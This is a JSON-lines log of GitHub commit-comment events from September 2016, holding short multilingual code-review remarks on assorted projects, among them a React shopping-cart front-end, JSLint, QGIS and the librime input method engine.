{"id":"4579484307","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069843,"position":5,"line":18,"path":"app/scripts/react/components/Checkout/CheckoutDeliveries.jsx","commit_id":"94ffd75c3bce03a8536dcd16d3005504ea704047","created_at":"2016-09-18T08:04:48Z","updated_at":"2016-09-18T08:04:48Z","body":"это как раз замена когда freeDeliveryThreshold смог становиться null. null считается вполне валидным значением. второй аргумент используется только если вернулся undefined"}},"created_at":"2016-09-18T08:04:48Z"}
{"id":"4579484387","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069844,"position":43,"line":50,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"ceffdd3ffd2f488c360fcc20d5b51e9d73e41800","created_at":"2016-09-18T08:04:52Z","updated_at":"2016-09-18T08:04:52Z","body":"нигде так делать нельзя потому что результат выполнения будет зависеть от реализации и ногих других факторов."}},"created_at":"2016-09-18T08:04:52Z"}
{"id":"4579485835","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069846,"position":21,"line":50,"path":"app/scripts/react/actions/CartActions.js","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:05:52Z","updated_at":"2016-09-18T08:05:52Z","body":"camelizeKeys - это глубокая замена ключей. не только верхнего уровня"}},"created_at":"2016-09-18T08:05:52Z"}
{"id":"4579485915","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069847,"position":53,"line":53,"path":"consumer/processing-services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T08:05:55Z","updated_at":"2016-09-18T08:05:55Z","body":"return Promise!"}},"created_at":"2016-09-18T08:05:55Z"}
{"id":"4579486289","type":"CommitCommentEvent","actor":{"login":"CodeJjang"},"repo":{"name":"linnovate/replay-infra"},"payload":{"comment":{"id":19069848,"position":68,"line":68,"path":"consumer/processing-services/set-video-authorization.js","commit_id":"b77f3367fccd50ed858ab67e4386f3a860ad7b2f","created_at":"2016-09-18T08:06:10Z","updated_at":"2016-09-18T08:06:10Z","body":"return Promise!"}},"created_at":"2016-09-18T08:06:10Z"}
{"id":"4579487528","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069849,"position":35,"line":35,"path":"app/scripts/react/reducers/cart.js","commit_id":"046407d44ce875440ba4e9765cf8e0a93c87f528","created_at":"2016-09-18T08:07:03Z","updated_at":"2016-09-18T08:07:03Z","body":"да, позже я разобрался что то поле которое необходимо регулируется флагом selling_by_weight"}},"created_at":"2016-09-18T08:07:03Z"}
{"id":"4579487556","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"douglascrockford/JSLint"},"payload":{"comment":{"id":19069850,"position":null,"line":null,"path":null,"commit_id":"185661488c2d805eddd99685fa39f8291e6a1187","created_at":"2016-09-18T08:07:04Z","updated_at":"2016-09-18T08:07:04Z","body":"The ES6 standard calls it an \"arrow function\" - That seems like it'd be a better name to use. Either that or \"lambda operator\" like C# does."}},"created_at":"2016-09-18T08:07:04Z"}
{"id":"4579487763","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069851,"position":11,"line":42,"path":"app/scripts/react/reducers/cart.js","commit_id":"755d45a95e72698402f570b7383490c46788ccec","created_at":"2016-09-18T08:07:13Z","updated_at":"2016-09-18T08:07:13Z","body":"Это мешает пониманию того что происходит и того что откуда берется. Есть модель данных, лучше ее придерживать не курочить. \r\n\r\nЯ не смогу этот код потом сопровождать, чтобы внести изменения придется переписывать.\r\n\r\nМожешь объяснить что такое amounts?"}},"created_at":"2016-09-18T08:07:13Z"}
{"id":"4579489206","type":"CommitCommentEvent","actor":{"login":"arieefrachman"},"repo":{"name":"arieefrachman/yii2lpjkmetro"},"payload":{"comment":{"id":19069856,"position":null,"line":null,"path":null,"commit_id":"5806d9409f786481811a4e436a7d0f155a13a754","created_at":"2016-09-18T08:08:16Z","updated_at":"2016-09-18T08:08:16Z","body":"thanks man..."}},"created_at":"2016-09-18T08:08:16Z"}
{"id":"4579489431","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069857,"position":106,"line":106,"path":"app/scripts/react/components/Pagination/Pagination.jsx","commit_id":"7feb569a9af805eba94fbf89a9dfcbaa38fc4495","created_at":"2016-09-18T08:08:25Z","updated_at":"2016-09-18T08:08:25Z","body":"query-string наиболее популярная"}},"created_at":"2016-09-18T08:08:25Z"}
{"id":"4579490259","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069858,"position":21,"line":50,"path":"app/scripts/react/actions/CartActions.js","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:08:59Z","updated_at":"2016-09-18T08:08:59Z","body":"я понимаю, не понимаю зачем уу делать на фронте"}},"created_at":"2016-09-18T08:08:59Z"}
{"id":"4579492429","type":"CommitCommentEvent","actor":{"login":"J4m3sth"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19069863,"position":null,"line":null,"path":null,"commit_id":"516db760f121017a516bfb39818dbffa534e128a","created_at":"2016-09-18T08:10:27Z","updated_at":"2016-09-18T08:10:27Z","body":"X0 ผมลองแล้วครับ เจอ unknow switch 0000\r\nแล้วเด้งหลุดครับ"}},"created_at":"2016-09-18T08:10:27Z"}
{"id":"4579493672","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19069866,"position":19,"line":233,"path":"config/webpack.common.js","commit_id":"68e796f8578568300d98d206d94381883a61b03b","created_at":"2016-09-18T08:11:18Z","updated_at":"2016-09-18T08:11:18Z","body":"This same fix should also be added to the `webpack.test.js` file?\r\nElse you still get warning message:\r\n\r\n>   [923] ./~/core-js/modules/es7.reflect.has-own-metadata.js 417 bytes {1} [built]\r\n>   [924] ./~/core-js/modules/es7.reflect.metadata.js 551 bytes {1} [built]\r\n>   [925] ./config/spec-bundle.js 2.13 kB {1} [built]\r\n> \r\n> WARNING in ./~/@angular/core/src/linker/system_js_ng_module_factory_loader.js\r\n> 45:15 Critical dependency: the request of a dependency is an expression\r\n> \r\n> WARNING in ./~/@angular/core/src/linker/system_js_ng_module_factory_loader.js\r\n> 57:15 Critical dependency: the request of a dependency is an expression\r\n\r\n"}},"created_at":"2016-09-18T08:11:18Z"}
{"id":"4579495366","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069870,"position":39,"line":129,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"bf918496b5d56c078db56b3b366186c907e2d31a","created_at":"2016-09-18T08:12:28Z","updated_at":"2016-09-18T08:12:28Z","body":"да. если есть packageItem то к общей сумме добавляем стоимость этой упаковки, если нет то добавляем стоимость выбранной упаковки из массива упаковок"}},"created_at":"2016-09-18T08:12:28Z"}
{"id":"4579496213","type":"CommitCommentEvent","actor":{"login":"BenjaminHae"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19069872,"position":4,"line":36,"path":"src/password.php","commit_id":"0eff97e436083d6621c459ee3319173dda9f1ba7","created_at":"2016-09-18T08:13:05Z","updated_at":"2016-09-18T08:13:05Z","body":"Why don't we just save it with `accountarray`? Keeping it separate could make things more complicated when changing things in the future."}},"created_at":"2016-09-18T08:13:05Z"}
{"id":"4579501077","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069887,"position":21,"line":50,"path":"app/scripts/react/actions/CartActions.js","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:16:26Z","updated_at":"2016-09-18T08:16:26Z","body":"можно и в бэке. так даже удобнее. если нет легаси кода который полагается на старый формат и есть политическая воля упорядочить это дело - было бы замечательно получать в готовом виде нужные данные"}},"created_at":"2016-09-18T08:16:26Z"}
{"id":"4579501583","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/spectrum_overload"},"payload":{"comment":{"id":19069888,"position":null,"line":null,"path":null,"commit_id":"404df06628ae9606bf6b597184528fe403cb15bc","created_at":"2016-09-18T08:16:49Z","updated_at":"2016-09-18T08:16:49Z","body":"In d973c95 I have added properties and a setter to make the xaxis and flux always be numpy arrays. These don't seem to run in the `__init__` so I still need to add `np.asarray` in the `__init__` assignment as well.\r\n\r\nTo learn more about properties and setters I used [this article](http://www.programiz.com/python-programming/property)."}},"created_at":"2016-09-18T08:16:49Z"}
{"id":"4579505652","type":"CommitCommentEvent","actor":{"login":"aleksxor"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069896,"position":21,"line":50,"path":"app/scripts/react/actions/CartActions.js","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:19:37Z","updated_at":"2016-09-18T08:19:37Z","body":"в целом, большой проблемы нет. инициализационные данные и те которые позже используются в компонентах жестко разделены экшеном инициализации и я точно знаю где какие"}},"created_at":"2016-09-18T08:19:37Z"}
{"id":"4579508318","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19069901,"position":null,"line":null,"path":null,"commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-18T08:21:33Z","updated_at":"2016-09-18T08:21:33Z","body":"I'm trying to hide columns when checkboxes are clicked using:\r\n```\r\nvar colIndexes = [[0], [1, 2, 3, 4, 5], [6, 7, 8], [9], [10, 11, 12, 13], [14, 15], [16, 17], [18, 19], [20]];\r\nvar index = -1;\r\nvar elements = $(document).find('input');\r\nconsole.log(elements);\r\nfor (var i=0; i < elements.length; i++) {\r\n    if ( elements[i].type === \"checkbox\" ) {\r\n        index++;\r\n        elements[i].onclick = function() {\r\n            if(elements[i].is(':checked'))\r\n            {\r\n                inst.getPlugin('hiddenColumns').showColumn(colIndexes[index]);\r\n            }\r\n            else\r\n            {\r\n                inst.getPlugin('hiddenColumns').hideColumns(colIndexes[index]);\r\n            }\r\n            inst.render();\r\n        }\r\n    }\r\n}\r\n```\r\nbut I keep getting the error\r\n``` TypeError: elements[i] is undefined ```\r\nfor the line\r\n``` if(elements[i].is(':checked')) ```\r\nI've also tried\r\n``` if(elements[i].checked) ```\r\n``` if(elements[i].prop('checked', true)) ```\r\n``` if(elements[i].attr('checked')) ```\r\nwith the same error. Any ideas why?"}},"created_at":"2016-09-18T08:21:33Z"}
{"id":"4579511710","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/spectrum_overload"},"payload":{"comment":{"id":19069902,"position":null,"line":null,"path":null,"commit_id":"d973c95d8dbb282ac3891cc4e62c5ed9751ff5d9","created_at":"2016-09-18T08:23:58Z","updated_at":"2016-09-18T08:23:58Z","body":"Adding the properties and setters means that the attributes can be assigned using `spec.xaxais = ... `\r\nnotation and they will be automatically converted into numpy arrays and other checks can be done on the inputs.\r\n\r\n    >>>spec = Spectrum.Spectrum()\r\n    >>>spec.xaxis = [1,2,3]\r\n    >>>spec.flux = [4,3,4]\r\n    >>>spec.axis\r\n    array([1,2,3])\r\n    >>>spec.axis\r\n    array( [4,3,4])\r\nInspired by [this article](http://www.programiz.com/python-programming/property)."}},"created_at":"2016-09-18T08:23:58Z"}
{"id":"4579511978","type":"CommitCommentEvent","actor":{"login":"Moritoh-ruby"},"repo":{"name":"minimaru/team_project"},"payload":{"comment":{"id":19069903,"position":null,"line":null,"path":null,"commit_id":"2b0e454bc6f4feabd109a23f9c1b5c4bcdbd027c","created_at":"2016-09-18T08:24:10Z","updated_at":"2016-09-18T08:24:10Z","body":"Isnｔ　ＡＩＩＩＴ　ＬＩＣＥＮＣE  existed？"}},"created_at":"2016-09-18T08:24:10Z"}
{"id":"4579512223","type":"CommitCommentEvent","actor":{"login":"prodigyIceVanilla2001"},"repo":{"name":"prodigyIceVanilla2001/Chat_website"},"payload":{"comment":{"id":19069904,"position":2,"line":2,"path":"README.md","commit_id":"c2884c35e6f8fa026746cbfad12cc956a9e3c80c","created_at":"2016-09-18T08:24:24Z","updated_at":"2016-09-18T08:24:24Z","body":"You only have to edit a few things in /iQ/index.php Database setup and server ip address"}},"created_at":"2016-09-18T08:24:24Z"}
{"id":"4579512881","type":"CommitCommentEvent","actor":{"login":"YyzHarry"},"repo":{"name":"YyzHarry/Image_Processing"},"payload":{"comment":{"id":19069906,"position":null,"line":null,"path":null,"commit_id":"70ba1874e2904fcaf98d9a8d7bdd16251bdb6c50","created_at":"2016-09-18T08:24:55Z","updated_at":"2016-09-18T08:24:55Z","body":"The function named Lucy_Richardson for method4."}},"created_at":"2016-09-18T08:24:55Z"}
{"id":"4579513132","type":"CommitCommentEvent","actor":{"login":"prodigyIceVanilla2001"},"repo":{"name":"prodigyIceVanilla2001/Chat_website"},"payload":{"comment":{"id":19069907,"position":1,"line":1,"path":"README.md","commit_id":"c2884c35e6f8fa026746cbfad12cc956a9e3c80c","created_at":"2016-09-18T08:25:07Z","updated_at":"2016-09-18T08:25:07Z","body":"You only have to edit a few things in /iQ/index.php Database setup and server ip address"}},"created_at":"2016-09-18T08:25:07Z"}
{"id":"4579515430","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19069911,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-18T08:26:57Z","updated_at":"2016-09-18T08:26:57Z","body":"better, but not close enough ya dag lover....\r\n\r\nthere's a slight discrepancy in position on normal vs hover\r\n\r\n![gif](https://cloud.githubusercontent.com/assets/3521959/18614179/d01cd420-7d81-11e6-9574-af9101a82742.gif)\r\n\r\nwhen hovered the position of arrow drops down left by around 1 px"}},"created_at":"2016-09-18T08:26:57Z"}
{"id":"4579517454","type":"CommitCommentEvent","actor":{"login":"LynnGitHub"},"repo":{"name":"LynnGitHub/ShareExtension"},"payload":{"comment":{"id":19069915,"position":null,"line":null,"path":null,"commit_id":"95d03d5f39dd3bec41a76d2896b3ccbffa28f3e5","created_at":"2016-09-18T08:28:24Z","updated_at":"2016-09-18T08:28:24Z","body":"??"}},"created_at":"2016-09-18T08:28:24Z"}
{"id":"4579519560","type":"CommitCommentEvent","actor":{"login":"bonkstok"},"repo":{"name":"bonkstok/testspace"},"payload":{"comment":{"id":19069919,"position":15,"line":15,"path":"githubb.txt","commit_id":"902c7930313aaee3ed31eb90a32a71aeb73aad16","created_at":"2016-09-18T08:29:52Z","updated_at":"2016-09-18T08:29:52Z","body":"#hey"}},"created_at":"2016-09-18T08:29:52Z"}
{"id":"4579520715","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19069924,"position":24,"line":14,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T08:30:40Z","updated_at":"2016-09-18T08:30:40Z","body":"Не плохо бы перенести на след.строку каждый вложенный тег"}},"created_at":"2016-09-18T08:30:40Z"}
{"id":"4579521713","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19069926,"position":24,"line":20,"path":"index.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T08:31:23Z","updated_at":"2016-09-18T08:31:23Z","body":"Куда то пропали цифры, на главной нули (0) должны быть"}},"created_at":"2016-09-18T08:31:23Z"}
{"id":"4579522186","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19069927,"position":26,"line":22,"path":"index.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T08:31:42Z","updated_at":"2016-09-18T08:31:42Z","body":"Куда то пропали цифры"}},"created_at":"2016-09-18T08:31:42Z"}
{"id":"4579522411","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19069928,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-18T08:31:52Z","updated_at":"2016-09-18T08:31:52Z","body":"Sorry for the stupid answers..."}},"created_at":"2016-09-18T08:31:52Z"}
{"id":"4579523240","type":"CommitCommentEvent","actor":{"login":"HBItw"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19069929,"position":null,"line":null,"path":null,"commit_id":"19a1dd805fae0eb8c13f1d4b8fde521cd2e3fa55","created_at":"2016-09-18T08:32:26Z","updated_at":"2016-09-18T08:32:26Z","body":"line 13  \"%PRIORITIZE_BOTH_TV_AND_CP_FOR_TRANSFER%\": \"傳送時優先考慮IV和CP\",\r\n\r\n             \"%PRIORITIZE_BOTH_IV_AND_CP_FOR_TRANSFER%\": \"傳送時優先考慮IV和CP\","}},"created_at":"2016-09-18T08:32:26Z"}
{"id":"4579524851","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069931,"position":21,"line":50,"path":"app/scripts/react/actions/CartActions.js","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:33:36Z","updated_at":"2016-09-18T08:33:36Z","body":"ты знаешь потому что ты помнишь что там содержится внутри переменных, потому что уже дебажил.\r\nА надо чтобы было так, чтобы это было понятно не изучая содержимое. \r\n\r\nСкажи Саше чтобы везде где тебе тебе надо давал в camelCase"}},"created_at":"2016-09-18T08:33:36Z"}
{"id":"4579525240","type":"CommitCommentEvent","actor":{"login":"Moritoh-ruby"},"repo":{"name":"minimaru/team_project"},"payload":{"comment":{"id":19069933,"position":null,"line":null,"path":null,"commit_id":"37208c7f61fd24717929775000b99fd48d2d11cc","created_at":"2016-09-18T08:33:52Z","updated_at":"2016-09-18T08:33:52Z","body":"ＢＭＩ＝体重÷（身長)÷（身長）"}},"created_at":"2016-09-18T08:33:52Z"}
{"id":"4579525673","type":"CommitCommentEvent","actor":{"login":"EvgenyIs"},"repo":{"name":"EvgenyIs/newGitTest"},"payload":{"comment":{"id":19069934,"position":1,"line":1,"path":"README.md","commit_id":"61a1e6f2047d435d262db760ef24d9919b25b32e","created_at":"2016-09-18T08:34:09Z","updated_at":"2016-09-18T08:34:09Z","body":"Test1Git"}},"created_at":"2016-09-18T08:34:09Z"}
{"id":"4579525908","type":"CommitCommentEvent","actor":{"login":"a26214311"},"repo":{"name":"Flandre/test"},"payload":{"comment":{"id":19069935,"position":null,"line":null,"path":null,"commit_id":"afffc73f785bd231245f19142cdb640f47a237eb","created_at":"2016-09-18T08:34:20Z","updated_at":"2016-09-18T08:34:20Z","body":"shikong is no baka！"}},"created_at":"2016-09-18T08:34:20Z"}
{"id":"4579525930","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069936,"position":45,"line":36,"path":"app/scripts/react/components/Checkout/CheckoutDeliveries.jsx","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:34:22Z","updated_at":"2016-09-18T08:34:22Z","body":"может проще HumanizedMoneyWithCurrency переписать чтобы он примам camilized?"}},"created_at":"2016-09-18T08:34:22Z"}
{"id":"4579526010","type":"CommitCommentEvent","actor":{"login":"motatoes"},"repo":{"name":"ImportantCool/gogonzo"},"payload":{"comment":{"id":19069937,"position":null,"line":null,"path":null,"commit_id":"1667c1d050eb1a729e7af912a4f18f709130d20b","created_at":"2016-09-18T08:34:24Z","updated_at":"2016-09-18T08:34:24Z","body":"fixes #12 "}},"created_at":"2016-09-18T08:34:24Z"}
{"id":"4579526344","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069938,"position":54,"line":43,"path":"app/scripts/react/components/Checkout/CheckoutDeliveries.jsx","commit_id":"18d9d8b7a1932f300009d7ed610ab002a060488f","created_at":"2016-09-18T08:34:39Z","updated_at":"2016-09-18T08:34:39Z","body":"опять.."}},"created_at":"2016-09-18T08:34:39Z"}
{"id":"4579527100","type":"CommitCommentEvent","actor":{"login":"moh0sw"},"repo":{"name":"PopcornTimeTV/PopcornTimeTV"},"payload":{"comment":{"id":19069940,"position":null,"line":null,"path":null,"commit_id":"a60efb55fb5d81ffc5dace4b90eb8f4e0e9d14c3","created_at":"2016-09-18T08:35:10Z","updated_at":"2016-09-18T08:35:10Z","body":"@rodriql yeah the 1.0.5 ipa is broken\r\nFor now you only can use 1.0.3.1 ipa"}},"created_at":"2016-09-18T08:35:10Z"}
{"id":"4579528625","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069943,"position":73,"line":73,"path":"src/gear/codepoint_translator.cc","commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T08:36:18Z","updated_at":"2016-09-18T08:36:18Z","body":"charset_ == '\" || charset_ == \"utf\" || ..."}},"created_at":"2016-09-18T08:36:18Z"}
{"id":"4579529521","type":"CommitCommentEvent","actor":{"login":"ktosiek"},"repo":{"name":"kvz/frey"},"payload":{"comment":{"id":19069944,"position":null,"line":null,"path":null,"commit_id":"3e4fea75c7fbfb619ccdda55280aab4a2bfde2ff","created_at":"2016-09-18T08:36:58Z","updated_at":"2016-09-18T08:36:58Z","body":"Hi! I've added an explicit LICENSE file to the project: https://github.com/ktosiek/ansible-nix/commit/82c9ca30e46470435c258ad04019a04a4d329626 - it's pretty much what you used here, but without the \"views and conclusions\" disclaimer.\r\nYou shouldn't have much trouble with adhering to that license, especially if you are using other galaxy roles - I think this is the most common license there :-)"}},"created_at":"2016-09-18T08:36:58Z"}
{"id":"4579532521","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069947,"position":87,"line":87,"path":"src/gear/codepoint_translator.cc","commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T08:39:06Z","updated_at":"2016-09-18T08:39:06Z","body":"We shall range-check each two-digit number, for example \"9099\" isn't a correct quwei code because 99 is out of range."}},"created_at":"2016-09-18T08:39:06Z"}
{"id":"4579533585","type":"CommitCommentEvent","actor":{"login":"topsec-liuxiuji"},"repo":{"name":"sqlcipher/android-database-sqlcipher"},"payload":{"comment":{"id":19069948,"position":null,"line":null,"path":null,"commit_id":"b8dcf3bd31d40e075dfed324e81372e406c64818","created_at":"2016-09-18T08:39:53Z","updated_at":"2016-09-18T08:39:53Z","body":"你好牛逼"}},"created_at":"2016-09-18T08:39:53Z"}
{"id":"4579533844","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19069949,"position":null,"line":null,"path":null,"commit_id":"e0d5d09f3a8e6c601d2e5ec8f90dc62e7d3d3f66","created_at":"2016-09-18T08:40:07Z","updated_at":"2016-09-18T08:40:07Z","body":":+1: \r\n@Mottie loves turtles"}},"created_at":"2016-09-18T08:40:07Z"}
{"id":"4579535620","type":"CommitCommentEvent","actor":{"login":"l3pp4rd"},"repo":{"name":"edharper01/godog"},"payload":{"comment":{"id":19069952,"position":null,"line":null,"path":null,"commit_id":"d8cdd56e1ea420529fb61c7e3e2db219317dd015","created_at":"2016-09-18T08:41:19Z","updated_at":"2016-09-18T08:41:19Z","body":"it would be more idiomatic to have **-o** flag as **go build -o dest** and skip execution. that could be accepted in pull request if you'd like to contribute"}},"created_at":"2016-09-18T08:41:19Z"}
{"id":"4579538183","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19069953,"position":null,"line":null,"path":null,"commit_id":"eba61013574bff36f03f791ec4e1b4fdadce43d5","created_at":"2016-09-18T08:43:12Z","updated_at":"2016-09-18T08:43:12Z","body":"It's a pyqt5 change, not qt 5 itself. See http://pyqt.sourceforge.net/Docs/PyQt5/pyqt4_differences.html#qfiledialog\r\n\r\nI hit the error using console on 16.04, so not sure why it's not triggered for you. In any case the only reason we are still keeping qt4 compatibility in master is for the handful of tests which aren't passing in qt5. I'm hoping to fix the server based tests this week, which leaves just the qvariant rounding issues. As soon as these are fixed qt5 will be mandatory. \r\n\r\nIn the meantime I'd suggest everyone using master should be on qt5 anyway, to help find and fix bugs. Use master_2 if you particularly need qt4 compatibility."}},"created_at":"2016-09-18T08:43:12Z"}
{"id":"4579540406","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19069956,"position":134,"line":190,"path":"examples/C/kvmsg.c","commit_id":"fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed","created_at":"2016-09-18T08:44:54Z","updated_at":"2016-09-18T08:44:54Z","body":"Ah okay, that makes sense. So if it's definitely all zeroes, why test for the presence of the frames? That condition is never going to be true, as far as I can tell. "}},"created_at":"2016-09-18T08:44:54Z"}
{"id":"4579541797","type":"CommitCommentEvent","actor":{"login":"BenjaminHae"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19069957,"position":4,"line":36,"path":"src/password.php","commit_id":"0eff97e436083d6621c459ee3319173dda9f1ba7","created_at":"2016-09-18T08:45:59Z","updated_at":"2016-09-18T08:45:59Z","body":"It would probably be easier to save it directly as accountarray[i][\"passwordlastchangetime\"]. That way it doesn't interfere with \"other\" where everything should be the same for every index."}},"created_at":"2016-09-18T08:45:59Z"}
{"id":"4579541844","type":"CommitCommentEvent","actor":{"login":"TakanariKida"},"repo":{"name":"TakanariKida/study"},"payload":{"comment":{"id":19069958,"position":null,"line":null,"path":null,"commit_id":"aabcd676454ed1a981c98d5c9b8ffe0e919e0ada","created_at":"2016-09-18T08:46:01Z","updated_at":"2016-09-18T08:46:01Z","body":"a"}},"created_at":"2016-09-18T08:46:01Z"}
{"id":"4579543951","type":"CommitCommentEvent","actor":{"login":"nitmir"},"repo":{"name":"vauxia/django-cas-server"},"payload":{"comment":{"id":19069960,"position":12,"line":352,"path":"cas_server/auth.py","commit_id":"0eae41b944da29138063dae90ffc62111ced1db6","created_at":"2016-09-18T08:47:37Z","updated_at":"2016-09-18T08:47:37Z","body":"LdapAuthUser inherit from DBAuthUser that already as a attributs methode that do exactly that"}},"created_at":"2016-09-18T08:47:37Z"}
{"id":"4579544895","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069961,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T08:48:18Z","updated_at":"2016-09-18T08:48:18Z","body":"辛苦了。只要能工作，那就是好的。\r\n如果標準再提高些，可能還想實現編碼補全。例如輸入區位碼不足四碼的時候，提示前面加〇的碼以及後面加任意數字補全的碼。這可以以後再做。\r\n`Query()` 函數有點長了。如果要再支持更多編碼，勢必拆分該函數。我喜歡這樣的結構：\r\n```\r\nmap[\"utf\"] = [](string query) { return ...; };\r\nmap[\"\"] = map[\"codepoint\"] = map[\"utf\"];  // aliases\r\n```"}},"created_at":"2016-09-18T08:48:18Z"}
{"id":"4579545416","type":"CommitCommentEvent","actor":{"login":"sirlatrom"},"repo":{"name":"mp911de/spring-cloud-vault-config"},"payload":{"comment":{"id":19069963,"position":66,"line":66,"path":"spring-cloud-vault-config-ssl/src/main/java/org/springframework/cloud/vault/config/ssl/VaultPkiTemplate.java","commit_id":"d9815d96ec26edab8111ce5ffe60ab880754dfb2","created_at":"2016-09-18T08:48:42Z","updated_at":"2016-09-18T08:48:42Z","body":"Probably the \"pki\" part of the path should be parameterised (can be configured when mounting the pki backend, we use it this way to configure a hierarchy of intermediate CA's)"}},"created_at":"2016-09-18T08:48:42Z"}
{"id":"4579545855","type":"CommitCommentEvent","actor":{"login":"YOUYOUYOU"},"repo":{"name":"YOUYOUYOU/helloworld"},"payload":{"comment":{"id":19069964,"position":null,"line":null,"path":null,"commit_id":"1e451d893e091b68b702944d56b9896506dd65c6","created_at":"2016-09-18T08:49:01Z","updated_at":"2016-09-18T08:49:01Z","body":"a branche"}},"created_at":"2016-09-18T08:49:01Z"}
{"id":"4579550108","type":"CommitCommentEvent","actor":{"login":"meeeA"},"repo":{"name":"cloudliner/team_project"},"payload":{"comment":{"id":19069965,"position":null,"line":null,"path":null,"commit_id":"ab2991237d48582925677cb9836c00780ea934b8","created_at":"2016-09-18T08:52:01Z","updated_at":"2016-09-18T08:52:01Z","body":"merge this file."}},"created_at":"2016-09-18T08:52:01Z"}
